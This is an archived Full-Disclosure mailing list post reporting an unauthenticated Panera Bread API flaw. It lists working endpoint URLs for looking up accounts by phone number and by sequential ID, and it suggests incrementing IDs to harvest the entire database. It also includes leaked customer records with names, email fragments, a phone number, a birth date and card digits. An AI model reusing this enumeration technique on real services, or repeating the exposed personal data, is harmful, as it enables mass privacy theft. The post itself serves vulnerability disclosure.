lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <CAJ=k2m=W95kwni7Sq11cmcLDO9E5e0QrYmsS=RA+4sN9AVLYkw@mail.gmail.com> Date: Mon, 2 Apr 2018 15:43:17 -0400 From: Jack Beanstalk <pnrabrdthrwy@...il.com> To: fulldisclosure@...lists.org Subject: [FD] Massive Breach in Panera Bread 7682200f0cd27a4f1a3c2301941d959aae7abf89136c38a4f1ded4d2bb7a67d7 I'd like to report a security vulnerability in Panera Bread's web application. There is a publicly available, completely unauthenticated API endpoint that allows anyone to access the following information about anyone who has ever signed up for an account to order food from Panera Bread: 1. Username 2. First and last name 3. Email address 4. Phone number 5. Birthday 6. Last four digits of saved credit card number 7. Saved home address 8. Social account integration information 9. Saved user food preferences and dietary restrictions Here are the API endpoints which you can use to verify this information: 1. https://delivery.panerabread.com/foundation-api/users/by-phone/9140000000 This returns the following JSON: {"accounts": [{"username":"denys","name":"romona ruiz","cardNumber":"********6515"},{"username":"mhmulcahy@...mail.com","name":"Marie Mulcahy","cardNumber":"********5527"},{"username":"fenrny@....com","name":"F B","cardNumber":"********7921"},{"username":"sabooky1@...oo.com","name":"C Davis","cardNumber":"********7108"},{"username":"jorgeialcalde","name":"Jorge Alcalde","cardNumber":"********6129"},{"username":"ktennister37@....com","name":"Kei Kino","cardNumber":"********6061"},{"username":"gettingbetter812@...oo.com","name":"jan jones","cardNumber":"********8950"},{"username":"kennny","name":"kenny poteat","cardNumber":"********4412"},{"username":"angelo151","name":"angelo ianello","cardNumber":"********8386"},{"username":"dblaperch@....com","name":"Deborah LaPerch","cardNumber":"********5384"},{"username":"bagnoni1@...online.net","name":"sadie bagnoni","cardNumber":"********5144"},{"username":"arsbreva@...mail.com","name":"Marea needle","cardNumber":"********7488"},{"username":"contessa1234","name":"CONTESSA SLEDGE","cardNumber":"********6702"},{"username":"lindapam","name":"elizabeth forlenzo","cardNumber":"********7085"},{"username":"jue-95@...mail.com","name":"juline G","cardNumber":"********4220"},{"username":"gleuanter","name":"Leo Zinder","cardNumber":"********9123"},{"username":"artlaura","name":"arthur hanson","cardNumber":"********8139"},{"username":"dlongua","name":"denise longua","cardNumber":"********0102"},{"username":"homestead19-86@....com","name":"Sandra Baglione","cardNumber":"********6851"},{"username":"kilsha22","name":"kicia fulchek","cardNumber":"********2654"}]} Note that you can look up usernames/email addresses for Panera Bread accounts if you know the target's phone number. This returns the username/email address and last four digits of the saved credit card of every user who has ever signed up with that phone number. 2. https://delivery.panerabread.com/foundation-api/users/uramp/7382194 This returns the following JSON: {"customerId":7382194,"username":"abcascio@....net","firstName":"Anthony","lastName":"Cascio","loyalty":{"cardNumber":"603077990852"},"emails":[{"id":23860763,"emailAddress":"abcascio@....net","emailType":"Personal","isDefault":true,"isOpt":true,"isVerified":true}],"phones":[{"id":18295989,"phoneNumber":"7032662951","phoneType":"Residential","countryCode":"1","extension":null,"name":null,"isSmsOpt":false,"isCallOpt":false,"isDefault":true,"isValid":true,"smsPreferences":[{"programName":"Delivery","isOpt":false,"isOptPending":false}]}],"isSmsGlobalOpt":false,"isEmailGlobalOpt":true,"isMobilePushOpt":false,"birthDate":{"birthDay":"25","birthMonth":"05","birthYear":"1948"},"userPreferences":{"foodPreferences":[{"code":3,"displayName":"Low Fat"}],"gatherPreference":{"code":7,"displayName":"Meal with family"}},"subscriptions":{"subscriptions":[{"subscriptionCode":1,"displayName":"Reward Reminders & Expiration Alerts","isSubscribed":false,"tncVersion":null},{"subscriptionCode":2,"displayName":"Panera Bread Updates & Special Offers","isSubscribed":false,"tncVersion":null}],"suppressors":[{"suppressionCode":1,"displayName":"Catering","isSuppressed":false},{"suppressionCode":2,"displayName":"CPG","isSuppressed":false}]},"addresses":[],"paymentOptions":{"creditCards":[],"payPals":[],"giftCards":[],"corporateCateringAccounts":[]},"taxExemptions":null,"socialIntegration":null,"favoriteCafes":[]} In this context, "7382194" is the user's account ID. Panera Bread uses sequential integers for account IDs, which means that if your goal is to gather as much information as you can instead about someone, you can simply increment through the accounts and collect as much as you'd like, up to and including the entire database. Hopefully they'll fix this if it gets enough attention. _______________________________________________ Sent through the Full Disclosure mailing list https://nmap.org/mailman/listinfo/fulldisclosure Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists